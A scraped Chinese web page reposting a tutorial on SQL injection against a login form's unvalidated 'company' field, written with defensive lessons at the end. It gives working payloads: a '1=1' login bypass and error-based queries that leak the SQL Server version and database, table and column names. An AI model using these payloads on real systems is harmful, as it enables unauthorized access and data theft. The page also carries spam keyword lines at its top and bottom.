婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > SQL注入全過程深入分析

SQL注入全過程深入分析

熱門標簽:千呼電話機器人可以試用嗎 電話機器人怎么代理商 電銷需要外呼系統嗎 安卡拉地圖標注app 互聯網電話外呼系統 我要地圖標注數量有限制嗎 零成本地圖標注賺錢 400電話辦理泰安 家庭農場地圖標注名稱怎樣起名

本文分析了SQL注入全過程。分享給大家供大家參考,具體如下:

初步注入--繞過驗證,直接登錄

公司網站登陸框如下:

可以看到除了賬號密碼之外,還有一個公司名的輸入框,根據輸入框的形式不難推出SQL的寫法如下:

復制代碼 代碼如下:
SELECT * From Table WHERE Name='XX' and Password='YY' and Corp='ZZ'

我發現前兩者都做一些檢查,而第三個輸入框卻疏忽了,漏洞就在這里!注入開始,在輸入框中輸入以下內容:

用戶名亂填,密碼留空,這種情況下點擊登錄按鈕后竟然成功登錄了。

我們看一下最終的SQL就會找到原因:

復制代碼 代碼如下:
SELECT * From Table WHERE Name='SQL inject' and Password='' and Corp='' or 1=1--'

從代碼可以看出,前一半單引號被閉合,后一半單引號被 “--”給注釋掉,中間多了一個永遠成立的條件“1=1”,這就造成任何字符都能成功登錄的結果。而Sql注入的危害卻不僅僅是匿名登錄。

中級注入--借助異常獲取信息

現在我們在第三個輸入框中寫入:

‘or 1=(SELECT @@version) –

如下:

后臺的SQL變成了這樣:

SELECT * From Table WHERE Name='SQL inject' and Password='' and Corp=''
or 1=(SELECT @@VERSION)--'

判斷條件變成了1=(SELECT @@VERSION),

這個寫法肯定會導致錯誤,但出錯正是我們想要的。點擊登錄后,頁面出現以下信息:

Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 (SP3) - 10.0.5500.0 (X64) Sep 21 2011 22:45:45
Copyright (c) 1988-2008 Microsoft Corporation Developer Edition (64-bit)
on Windows NT 6.1 X64> (Build 7601: Service Pack 1) ' to data type int.

可怕的事情出現了,服務器的操作系統和SQL Server版本信息竟然通過錯誤顯示出來。

危害擴大--獲取服務器所有的庫名、表名、字段名

接著,我們在輸入框中輸入如下信息:

復制代碼 代碼如下:
t' or 1=(SELECT top 1 name FROM master..sysdatabases where name not in (SELECT top 0 name FROM master..sysdatabases))--

此時發現第三個輸入框有字數長度的限制,然而這種客戶端的限制形同虛設,

直接通過Google瀏覽器就能去除。

點擊登錄,返回的信息如下:

Conversion failed when converting the nvarchar value 'master' to data type int.

數據庫名稱“master”通過異常被顯示出來!依次改變上面SQL語句中的序號,

就能得到服務器上所有數據庫的名稱。

接著,輸入信息如下:

復制代碼 代碼如下:
b' or 1=(SELECT top 1 name FROM master..sysobjects where xtype='U' and name not in (SELECT top 1 name FROM master..sysobjects where xtype='U'))--

得到返回信息如下:

Conversion failed when converting the nvarchar value 'spt_fallback_db' to data type int.

我們得到了master數據庫中的第一張表名:“spt_fallback_db”,

同上,依次改變序號,可得到該庫全部表名。

現在我們以“spt_fallback_db”表為例,嘗試獲取該表中所有的字段名。在輸入框中輸入以下代碼:

復制代碼 代碼如下:
b' or 1=(SELECT top 1 master..syscolumns.name FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='spt_fallback_db');

于是,得到錯誤提示如下:

"Conversion failed when converting the nvarchar value 'xserver_name' to data type int.";

這樣第一個字段名“xserver_name”就出來了,依次改變序號,就能遍歷出所有的字段名。

最終目的--獲取數據庫中的數據

寫到這里,我們已知通過SQL注入能獲取全部的數據庫,表,及其字段,為了防止本文完全淪為注入教程,獲取數據的代碼就不再描述,而這篇文章的目的也已達到,SQL注入意味著什么?意味著數據庫中所有數據都能被盜取。

當知道這個危害以后,是否還能有人對SQL注入漏洞置之不理?

結語

關于安全性,本文可總結出一下幾點:

1. 對用戶輸入的內容要時刻保持警惕。
2. 只有客戶端的驗證等于沒有驗證。
3. 永遠不要把服務器錯誤信息暴露給用戶。

除此之外,我還要補充幾點:

1. SQL注入不僅能通過輸入框,還能通過Url達到目的。
2. 除了服務器錯誤頁面,還有其他辦法獲取到數據庫信息。
3. 可通過軟件模擬注入行為,這種方式盜取信息的速度要比你想象中快的多。
4. 漏洞跟語言平臺無關。

您可能感興趣的文章:
  • PHP中防止SQL注入實現代碼
  • PHP+MySQL 手工注入語句大全 推薦
  • php中防止SQL注入的最佳解決方法
  • php防止SQL注入詳解及防范
  • 利用SQL注入漏洞拖庫的方法
  • discuz的php防止sql注入函數
  • SQL注入中繞過 單引號 限制繼續注入
  • Php中用PDO查詢Mysql來避免SQL注入風險的方法
  • c#.net全站防止SQL注入類的代碼
  • 防止xss和sql注入:JS特殊字符過濾正則
  • php SQL防注入代碼集合
  • SQL Injection with MySQL 注入分析
  • php中sql注入漏洞示例 sql注入漏洞修復

標簽:來賓 東營 新鄉 池州 黃山 大同 濱州 文山

巨人網絡通訊聲明:本文標題《SQL注入全過程深入分析》,本文關鍵詞  SQL,注入,全過程,深入分析,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《SQL注入全過程深入分析》相關的同類信息!
  • 本頁收集關于SQL注入全過程深入分析的相關信息資訊供網民參考!
  • 推薦文章
    主站蜘蛛池模板: 蕲春县| 新巴尔虎右旗| 荣昌县| 景东| 琼海市| 达孜县| 山阳县| 政和县| 筠连县| 汉寿县| 鲁甸县| 盐边县| 渑池县| 禄丰县| 无棣县| 常熟市| 海兴县| 永昌县| 保靖县| 沁源县| 塔城市| 穆棱市| 沐川县| 大埔区| 康平县| 土默特右旗| 甘泉县| 南郑县| 那坡县| 高密市| 金沙县| 玉门市| 福贡县| 资兴市| 德江县| 临猗县| 香港| 崇州市| 二手房| 通化市| 南开区|